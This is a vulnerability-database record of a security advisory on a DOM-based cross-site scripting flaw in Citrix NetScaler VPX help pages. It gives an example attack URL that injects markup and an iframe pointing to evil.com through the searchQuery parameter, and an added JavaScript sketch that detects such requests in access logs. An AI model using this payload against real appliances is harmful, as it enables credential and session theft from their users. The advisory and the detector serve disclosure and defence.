ID

VAR-E-201503-0117


TITLE

Citrix NetScaler VPX Cross Site Scripting

Trust: 0.5

sources: PACKETSTORM: 130936

DESCRIPTION

It was discovered that the help pages of Citrix VPX are vulnerable to cross site scripting.

Trust: 0.5

sources: PACKETSTORM: 130936

AFFECTED PRODUCTS

vendor: citrix | model: netscaler vpx | scope: - | version: -

Trust: 0.5

sources: PACKETSTORM: 130936

EXPLOIT

------------------------------------------------------------------------
Citrix NetScaler VPX help pages are vulnerable to Cross-Site Scripting
------------------------------------------------------------------------
Han Sahin, August 2014

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the help pages of Citrix VPX are vulnerable to
Cross-Site Scripting. This issue allows attackers to perform a wide
variety of actions, such as stealing the victim's session token or login
credentials, performing arbitrary actions on the victim's behalf, and
logging their keystrokes.

------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was discovered in Citrix NetScaler VPX NSVPX-ESX-10.5-50.10;
other versions may also be vulnerable.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Citrix reports that this vulnerability is fixed in NetScaler 10.5 build
52.8nc.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20140807/citrix_netscaler_vpx_help_pages_are_vulnerable_to_cross_site_scripting.html

This issue exists because the value of the searchQuery URL parameter is assigned client-side to contentDiv.innerHTML (DOM-based Cross-Site Scripting), for example:

https://<target>/help/rt/large_search.html?searchQuery=<h1>Reset your password below:<h1><iframe src='http://www.evil.com'/>&type=ctxTV

Tricking a victim into visiting a specially crafted URL allows attackers to run arbitrary client-side scripting code within the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
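
Because searchQuery travels in the URL query string rather than the fragment, requests carrying markup for the help search page show up in web access logs. The following detection sketch is an added example, not part of the original advisory or of Citrix code; the log format, sample lines, addresses and function names are constructed assumptions.

```javascript
// Constructed sample access-log lines (combined log format, documentation IPs).
const SAMPLE_LOG = [
  '192.0.2.10 - - [20/Mar/2015:06:16:32 +0000] "GET /help/rt/large_search.html?searchQuery=load+balancing&type=ctxTV HTTP/1.1" 200 5120',
  '192.0.2.44 - - [20/Mar/2015:06:17:01 +0000] "GET /help/rt/large_search.html?searchQuery=%3Ch1%3EReset%3C%2Fh1%3E&type=ctxTV HTTP/1.1" 200 5120',
  '192.0.2.44 - - [20/Mar/2015:06:17:09 +0000] "GET /help/rt/large_search.html?searchQuery=%253Ciframe%2520src%253Dx%253E&type=ctxTV HTTP/1.1" 200 5120',
  '192.0.2.77 - - [20/Mar/2015:06:18:40 +0000] "GET /menu/neo?searchQuery=%3Cb%3E HTTP/1.1" 200 812',
];

// Path and parameter name are taken from the advisory's example URL.
const HELP_SEARCH_PATH = '/help/rt/large_search.html';

// Decode repeatedly (bounded) so double-encoded markup is not missed.
// A malformed escape such as a literal "100%" stops decoding instead of throwing.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { return current; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns { client, searchQuery } when the line is a help-search request
// whose decoded searchQuery contains angle brackets, otherwise null.
function inspectLine(line) {
  const m = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/.exec(line);
  if (!m) return null;
  let url;
  try { url = new URL(m[1], 'https://placeholder.invalid'); } catch { return null; }
  if (url.pathname !== HELP_SEARCH_PATH) return null;
  const raw = url.searchParams.get('searchQuery'); // already decoded once
  if (raw === null) return null;
  const decoded = fullyDecode(raw);
  return /[<>]/.test(decoded) ? { client: line.split(' ')[0], searchQuery: decoded } : null;
}

function findSuspiciousRequests(lines) {
  return lines.map(inspectLine).filter(Boolean);
}

console.log(findSuspiciousRequests(SAMPLE_LOG));
```

A hit only shows that markup was sent to the page; whether it executed depends on the NetScaler build, so confirm the appliance runs the fixed build named above.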

Trust: 0.5

sources: PACKETSTORM: 130936

EXPLOIT HASH

LOCAL

SOURCE

md5: 50c91a8bdcdd159b0b9034e8ccc241ed
sha-1: 89ce10965f63df5c7dbda31db7e7c6ec1578a536
sha-256: d441a8929d46f3b81888279baadee2699e3507b40eda951a86945b935b33baac

Trust: 0.5

sources: PACKETSTORM: 130936

PRICE

free

Trust: 0.5

sources: PACKETSTORM: 130936

TYPE

xss

Trust: 0.5

sources: PACKETSTORM: 130936

TAGS

tag:exploit

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 130936

CREDITS

Han Sahin

Trust: 0.5

sources: PACKETSTORM: 130936

EXTERNAL IDS

db: PACKETSTORM | id: 130936

Trust: 0.5

sources: PACKETSTORM: 130936

SOURCES

db: PACKETSTORM | id: 130936

LAST UPDATE DATE

2022-07-27T09:51:57.608000+00:00


SOURCES RELEASE DATE

db: PACKETSTORM | id: 130936 | date: 2015-03-20T06:16:32